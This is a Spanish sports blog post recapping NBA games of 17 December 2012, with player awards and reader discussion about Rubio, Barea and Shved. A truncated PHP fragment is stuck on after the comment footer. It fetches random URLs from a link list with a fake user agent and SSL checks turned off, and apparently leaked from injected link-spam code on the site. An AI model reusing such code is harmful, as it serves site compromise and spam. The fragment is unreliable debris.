La Crónica: Lin toma el Madison

18 de December de 2012 por Simon

Intensísima jornada de lunes en la apertura de la penúltima semana del año o última semana antes de que el mundo se acabe, se transforme o lo que demonios sea lo que predijeran los mayas. En una jornada en la que entraban en liza los 5 mejores equipos de la liga, la vuelta de Lin al Madison Square Garden y el segundo partido de la temporada de nuestro querido Ricky Rubio centraban los focos de la jornada.

Los Knicks perdieron su imbatibilidad en casa de manera sorprendente y clara en el regreso de Jeremy Lin al Madison. El partido fue dominado prácticamente desde principio a fin  por unos Rockets  que solo se vieron por debajo al final del primer cuarto gracias a un gran rush final de los Knicks. En el segundo cuarto el partido quedaría visto para sentencia con un parcial de 27 a 11 a favor del equipo de Houston comandado por un Jeremy Lin a un nivel espectacular que conseguiría en esta primera parte 16 de sus 22 puntos. A pesar de ir 15 abajo al descanso los Knicks reaccionaron y se llegaron a poner 7 abajo (62-55) pero un parcial de 13-0 para Houston puso el punto y final a toda posibilidad de remontada. New York maquilló el marcador en un último cuarto y sus jugadores aprovecharon para engrosar sus estadísticas individuales. Decir que por parte de los Knicks no jugó Carmelo Anthony, lo cual facilitó mucho las cosas a los Rockets (109-96).

Ricky Rubio y los suyos visitaban el Amway Center y se las prometían muy felices. 4 victorias seguidas y por primera vez, su equipo podía estar casi al completo (Roy y Budinger aparte). Esta vez se vio un Rubio más acorde al que deberíamos haber visto en su primer partido tras 10 meses parado: lento y costándole seguir el ritmo del partido por momentos, algo normal tras el largo periodo de inactividad. En el primer tiempo las cosas funcionaban para los lobos con gran juego coral y sobre todo un gran nivel de su juego interior. Se fueron 12 arriba al descanso con la sensación de tener el partido bastante encarrilado. Pero, si durante el fin de semana hablábamos de jugadores especiales como Ricky, ayer apareció otro jugador especial a su manera que es ese niño grande llamado Big Baby Davis. Ayer estuvo desatado en la segunda mitad, las metió de todos los colores: al contraataque, a la media vuelta, en suspensión, al poste, mates… Terminó el partido con 28 puntos de los cuales 20 llegaron en la segunda mitad. Él inició la remontada a falta de 7 minutos para el final de tercer cuarto con dos robos seguidos y 3 canastas cuando Orlando caía por 15 puntos. A partir de ahí los Wolves se vieron maniatados ante el buen hacer de los Magic que acabarían ganando el partido por una cómoda renta de 9 puntos (93-102). Love acabó el partido con 23 puntos y 15 rebotes, pero  solo 6 de esos puntos llegaron en la segunda parte. Feo calendario el que llega ahora a los de Rick Adelman que en sus próximos 3 partidos se enfrentan a Miami, Oklahoma y New York. 

En el gran partido de la jornada se enfrentaban primero y segundo del Oeste. Los Thunder recibían a los Spurs en un óptimo estado de forma y dispuestos a alargar su racha de 10 partidos ganados consecutivamente. Ayer no dieron opción alguna a San Antonio Spurs  merced a una buena primera parte y a un tercer cuarto en el que les pasaron literalmente por encima y casi acaban doblándoles en el marcador de ese parcial. Ni siquiera hizo falta que Kevin Durant forzara la máquina gracias a un inconmensurable Serge Ibaka que terminó  el partido con 25 puntos y 17 rebotes a los que añadió 3 tapones. Westbrook y Martin también rindieron a un gran nivel con 22 y 20 puntos respectivamente mientras que Durant se quedó en 19 puntos.  De Colo y Parker terminaron con 14 puntos cada uno como máximos anotadores de los Spurs. Duncan se quedó 12 puntos en 24 minutos y no participó en los últimos 15 minutos del encuentro pues Popovich le reservó una vez que vio que las opciones de victoria eran muy bajas (93-107).

En el resto de la jornada, Clippers ganaron en Detroit para alargar su racha a 10 victorias consecutivas en un partido jugado a  una baja anotación. El partido fue siempre a favor de Clippers con pocas diferencias pero siempre fueron los de Griffin por delante hasta el último cuarto en el que Clippers abrió una brecha de 8 puntos que mantuvieron y alargaron hasta el final. Los mejores de Clippers fueron Griffin y Crawford con 15 puntos cada uno (88-76).

Memphis ganó a Chicago en casa de la mano de Mike Conley que fue el máximo anotador de un partido en que ni Gay ni Randoph ni Gasol estuvieron acertados. De hecho pr´cticamente ningún jugador del partido lo estuvo como pruebanlos 71 puntos de Chicago y los 80 que alcanzó apenas Memphis (71-80).

Finalmente, Sacramento cayó en Arizona ante los pupilos de Alvin Gentry.  Dudley y Brown anotaron 20 y 22 puntos respectivamente para liderar a los Suns a su décima victoria de la temporada. Beasley es el que parece perdido para la causa del basket, tras la temporada que se está cascando no creo que vuelva a tener ninguna oportunidad importante más. Por parte de Sacramento el mejor fue Fredette que parece haber encontrado su rol en la liga y en su equipo. Tyreke fue baja y Cousins se marcó un 1/10 en tiros de campo…  Así es imposible que Sacramento gane (90-101).

PREMIOS

MVP: Trío de ases con Serge Ibaka (25 puntos, 17 rebotes y 3 tapones), James Harden (28 puntos y 10 rebotes) y Glen Davis (28 puntos con un 13 de 17). En todo caso podríamos poner un poco por delante al de los Thunder.

Rookie: A Chris Copeland le dieron todos los minutos del mundo en el último cuarto de un partido decidido y los aprovechó a la perfección. Acabó con 29 puntos y 5 rebotes. Su compañero Pablo Prigioni le ayudó bastante a base de asistencias. El argentino anotó 14 puntos y repartió 5 asistencias. Nando de Colo se fue a casa con un 14-6.

Sorpresa: Jimmer Fredette enseña un poco la patita. En ausencia de Evans acabó con 22 puntos.

Decepción: Partido para olvidar del ruso Alexey Shved: 1 de 8 en tiros para 3 puntos y 4 pérdidas. Demarcus Cousins tampoco tuvo el día y se quedó en 9 puntos.

Esfuerzo en vano: Kevin Love volvió tras su ausencia en el partido anterior con unas estadísticas habituales: 23 puntos, 15 rebotes y 3 robos. De todos modos, en la segunda parte, como todo su equipo, fue superado por los Magic.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. txusma dice:
    #1

    Oh my god! Vaya pasos de Rudy Gay…

      Citar

  2. Denise dice:
    #2

    Tremenda temporada de los Magic callando bocas a diestro y siniestro. Davis en plan jugador franquicia, Vucevic yendo por le buen camino para convertirse en un crack, Redick alcanzando una buena regularidad, Afflalo sintiendose importante y tomando galones, y Nelson haciendo para mí la 2º mejor temporada de su carrera.
    Después jugadores jovenes que le echan huevos como Moore, Nicholson y Harkless; y Ayon y mcRobets no me gustan pero hacen lo que pueden dentro de sus capacidades.
    A ver si consiguieramos empaquetar a Turkoglu y conseguir un equipo mas competitivo.

      Citar

  3. Pau! dice:
    #3

    ¿Soy el único que piensa que Ricky y Barea no se complementan en la pista? En cuanto Barea (que juega de escolta) toca la bola adopta la posición de base y deja a Ricky como escolta, donde no se productivo para nada.
    Sin embargo, Ridnour y Shved adoptan bien las dos posiciones en función del compañero con el que esté jugando.

      Citar

  4. simon dice:
    #4

    Pau!:
    ¿Soy el único que piensa que Ricky y Barea no se complementan en la pista? En cuanto Barea (que juega de escolta) toca la bola adopta la posición de base y deja a Ricky como escolta, donde no se productivo para nada.
    Sin embargo, Ridnour y Shved adoptan bien las dos posiciones en función del compañero con el que esté jugando.

    Totalmente, De todas formas creo que en cuanto esté Ricky en forma, Barea y el jugarán muy pocos minutos juntos.

      Citar

  5. diestro dice:
    #5

    una preguntilla, ¿creeis que puede ser considerado Ibaka para el MIP?

    La ausencia de Harden le esta dando más peso ofensivo en el equipo, y creo que de aquí a final de temporada solo puede ir para arriba.

      Citar

  6. Pikerton64 dice:
    #6

    Pau! y de nuevo Simón han dicho todo lo que había que decir. Ricky y Rid saldrán de titulares y Shved saldrá junto a Barea desde el banquillo. Pero es lo de siempre, cuando Barea chupa, 4-13, cuando juega de escolta, lo hace genial. Suena tonto decirlo, pero pareciera como si Barea tuviera miedo de que el año pasado Ricky y este Shved le quitasen el puesto, algo innecesario si cada uno cumple su rol y juega a su nivel.
    Nos ganaron porque en los últimos 3-5 minutos la afición de Orlando defendió increíble a Minnesota, que se quedó sin ideas. Parecían sin jugadas, echados a su suerte por Adelman. Sigue dando la sensación de que Derrick Williams no tiene hueco, y eso que ayer volvió a hacerlo bien.
    Ricky mal, pero bah.

    En Orlando, Reddick genial, me encanta, y Davis casi sin fallos justo cuando Love desapareció. Los rookies, como dice Denise, le echan huevos, y hay pocas cosas que a mí me gusten más que eso, porque depende de uno, no como el talento.

      Citar

  7. simon dice:
    #7

    Una pregunta Pikerton tu que los has visto mas pues yo solo los he visto con Ricky, antes solo a trozos. No te parece Shved el mismo tipo de jugador que Barea pero con mucho mas físico y algunas cualidades mas??

      Citar

  8. ralage dice:
    #8

    diestro: una preguntilla, ¿creeis que puede ser considerado Ibaka para el MIP?

    Bueo, vaya por delante que ese premio ahora mismo es para OJ Mayo que lo está bordando.
    Ibaka , quizá este en la conversación , pero P.George o Varejao en mi opinión lo superan

      Citar

  9. Denise dice:
    #9

    El MIP para Vucevic, 10-10 doblando ahora mismo sus numeros del año pasado, y pasando de un 53% en Tiros libres a un 73%. Aprende Howard!!

      Citar

  10. Pikerton64 dice:
    #10

    @Simon Podría decirse que Shved y Barea son jugadores similares en cuanto a cómputo global, pero la verdad es que son diferentes. Barea es un jugador anotador y Shved tiene un corte más pasador. Barea es más de penetrar, de atacar a su defensor, de entrar a sacar la falta, y Shved más de tirar de 3 o buscar el pase, el corte de un compañero. A mi parecer, el primer recurso de Barea es entrar y si eso luego pasarla, Shved intenta pasar y si no tiene a nadie se la juega de 3 que valen más. En defensa influye más el físico. Barea busca la falta en ataque y Shved en cambio se ha adaptado de perlas y defiende genial, muy pegado. Cubre el tiro muy bien. De nuestros 6 guards Shved es el que tiene más tendencia al rebote cerca del aro, Barea lo espera fuera, claro. Diría que quien tiene un pase más parecido al de Ricky en Minnesota es Shved, pues posee una gran visión de juego, y tengo muchas ganas de ver lo que pueden dar de sí juntos en la cancha, con tanto pase y cubriendo Shved las deficiencias de Ricky, como Ridnour.

    PD: La conexión este Shved-AK-Pek es un punto a favor de Shved.

      Citar

  11. HisRoyalAirness dice:
    #11

    ralage: Bueo, vaya por delante que ese premio ahora mismo es paraOJ Mayo que lo está bordando.
    Ibaka , quizá este en la conversación , peroP.George o Varejao en mi opinión lo superan

    A lo mejor es para Harden, que promedia 10 puntos más que el año pasado y ha subido en rebotes y asistencias. Vamos, digo yo

      Citar

  12. Chipi dice:
    #12

    Si Harden gana el MIP nos lo canjeáis a los que le pusimos como mejor 6º hombre en la porra, verdad?

      Citar

  13. Denise dice:
    #13

    3 oportunidades desperdiciadas de Bobcats para ganar el partido en el Staples. Y ya van 12…seguidas perdiendo

      Citar

  14. simon dice:
    #14

    Recien levantado y mirando el box del Bobcats- Lakers… soy yo o han sacado el partido para adelante Meeks, Peace y Morris??? OMG!!! ….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>